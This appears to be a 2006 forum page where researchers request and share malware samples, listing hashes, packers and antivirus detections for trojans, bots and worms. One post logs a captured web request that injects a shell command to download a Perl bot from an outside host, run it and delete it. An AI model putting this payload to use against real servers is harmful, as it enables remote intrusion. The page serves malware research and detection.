Skip navigation.
Home

Malware

Cryzip Wanted

| |

Does anyone have a copy of the new Cryzip trojan that purportedly encrypts files then demands a $300 ransom for decryption? Thanks.

Trojan.Win32.Morwill.B

| |

MD5: 1d098fb29bf0c99fd786e5e6c749f9eb

AntiVir 6.34.0.53 03.07.2006 TR/Click.Morwill.B.3
Avast 4.6.695.0 03.06.2006 no virus found
AVG 718 03.07.2006 Adware Generic.AFJ
Avira 6.33.1.53 03.07.2006 TR/Click.Morwill.B.3
BitDefender 7.2 03.07.2006 Trojan.Clicker.Morwill.B
CAT-QuickHeal 8.00 03.07.2006 no virus found
ClamAV devel-20060126 03.07.2006 no virus found
DrWeb 4.33 03.07.2006 no virus found
eTrust-InoculateIT 23.71.95 03.07.2006 no virus found
eTrust-Vet 12.4.2108 03.07.2006 no virus found
Ewido 3.5 03.07.2006 Hijacker.Morwill.b
Fortinet 2.71.0.0 03.07.2006 Adware/Morwill

sdbots from soinull

| |

Thanks to soinull for the big contribution.
Password is infected

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 6fc1e9e7942ba69aa7d4e252919a108e
SHA1SUM: 48e3941bdeff80273e474a2a6f0d033d73b4adf5
SHA256SUM: f000dde6db5d6188ba422b51c7908c9fc5fdad74cb1f3a6a24d75711e04595ae
A/V SCAN: Found Win32/Rbot
PACKER: PE_PATCH.PECOMPACT, PECBUNDLE, PECOMPACT
#################################

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 3780075cda61d6fc9487e412dc20d6bf
SHA1SUM: d0c5757874c24c22a272815c0e25e9d20434316f

Worm.Rays.A

| |

Thanks to Scarlet Pimpernell for the sample.

#################################
FILE TYPE: MS-DOS executable (EXE), OS/2 or MS Windows
MD5SUM: 2a53b32f891e1ec1bf71a3f3746d4bbb
SHA1SUM: 846e2bcdc0a2e2911056b57948f533d1096a003f
SHA256SUM: e7f0f9351093d504f7a65f1980f4312e79e256275d02037d4106e10394e13fcb
A/V SCAN: Worm.Rays.A
#################################

Trojan.Win32.Agent.Q

| |

EDITED by Tebodell

2C2EE583.DLL
MD5SUM: 476d8b31bfd01f2d264f2133c47a3d37
SHA1SUM: ba5ff9dfbd0702e85799ed46dd3197691b4eb149
SHA256SUM: 1dc6daa68dc554d95db5d9506f7ccb4eb85750c93f90f3b1762d74a096257ae0

PACKER: UPX
REF: Submitted by MythX
DATE FOUND: 2/20/2006
VECTOR: Email
THREAT: Backdoor
CME #: N/A

Shellbot reloaded

| |

Found this probing the networks just now... more soon.

UPDATE: Mmm Google hunting..

GET phpfile.php?action=logout&siteurl=http://www.carteirovirtual.org/cmd.txt?&cmd=cd%20/tmp;\
GET%20http://www.athgroup.org/bot3.txt;perl%20bot3.txt;rm%20-rf%20bot3.txt? HTTP/1.0

PackBot

Found one PackBot.p

md5sum : 4880165cef39e60fa85fe32b801bc33e
infected: Backdoor.Win32.PackBot.p

lys.

Looking for a malware md5 list

| |

I'm currently involved in doing some forensic analysis with Helix, and I was hoping someone in the forum could point me in the direction of a good md5 list for common malware (sdbot/gaobot/mytob variants, general worms, virii, etc.) Any help would be appreciated.

Austere
divinespiral-at-gmail.com

New Linux Malware

Two linux malware in zip.

session: infected: Backdoor.Linux.Keitan.c

derfig: infected: Net-Worm.Linux.Mare.e

lys.

Searching : OSX.Leap.A

Hi,

I'm looking for OSX.Leap.A malware "latestpics.tgz"

https://www-secure.symantec.com/avcenter/venc/data/osx.leap.a.html

Does someone have this one?

tia,

lys

Syndicate content